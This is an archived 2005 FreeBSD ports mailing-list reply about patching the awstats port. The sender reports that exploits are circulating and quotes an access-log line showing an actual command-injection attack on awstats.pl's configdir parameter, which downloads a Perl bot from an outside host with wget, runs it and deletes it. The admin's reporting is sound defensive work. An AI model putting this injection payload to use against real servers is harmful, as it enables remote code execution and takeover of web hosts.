From owner-freebsd-ports@FreeBSD.ORG Thu Jan 27 03:53:29 2005 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DD64316A4CE for ; Thu, 27 Jan 2005 03:53:29 +0000 (GMT) Received: from mailhost.schluting.com (schluting.com [131.252.214.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9CE6F43D39 for ; Thu, 27 Jan 2005 03:53:29 +0000 (GMT) (envelope-from charlie@schluting.com) Received: from localhost (localhost [127.0.0.1]) by mailhost.schluting.com (Postfix) with ESMTP id 35A212146 for ; Wed, 26 Jan 2005 19:53:29 -0800 (PST) Received: from mailhost.schluting.com ([127.0.0.1]) by localhost (schluting.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 36630-10 for ; Wed, 26 Jan 2005 19:53:22 -0800 (PST) Received: from [131.252.213.83] (schrodinger.cat.pdx.edu [131.252.213.83]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by mailhost.schluting.com (Postfix) with ESMTP id 264062114 for ; Wed, 26 Jan 2005 19:53:22 -0800 (PST) Message-ID: <41F865B1.1030901@schluting.com> Date: Wed, 26 Jan 2005 19:53:21 -0800 From: Charlie Schluting User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: ports@freebsd.org References: <41F00880.2050506@covad.net> <41F71C20.4080002@covad.net> <790a9fff05012608282ceb53b2@mail.gmail.com> <20050127012022.GD18600@hal9000.halplant.com> In-Reply-To: <20050127012022.GD18600@hal9000.halplant.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: by your mom at schluting.com Subject: Re: FreeBSD Port: awstats-6.2 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Jan 2005 03:53:30 -0000 On 1/26/2005 5:20 PM, Andrew J Caines wrote: > FWIW, I think the original patch posted was lacking some changes in the > pkg-plist which may or may not have been in the 6.2 update, when various > bit moved around and the installed files changed. > > I've made another[1] for the 6.3 port[2]. This 6.3 port builds, installs, > runs[3] and deinstalls cleanly. It doesn't specifically address any .jar > install or other issues. Indeed, the patch works (had to manually grab the tarball). FWIW, yes, exploits are definitely in the wild. I grepped my logs for "wget" and saw one (successful) attempt: /var/log/httpd-access.log:66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20 HTTP/1.1" 200 588 "-" "LWP::Simple/5.65" If you look at the code on: http://www.theplaza.co.uk/media/bot you'll see that it tries to start: www 29943 101.6 0.5 4236 3504 ?? R 5:38PM 113:06.70 /usr/local/apache/bin/httpd -DSS1 (perl) Fuckers :( Thanks for the patch! -Charlie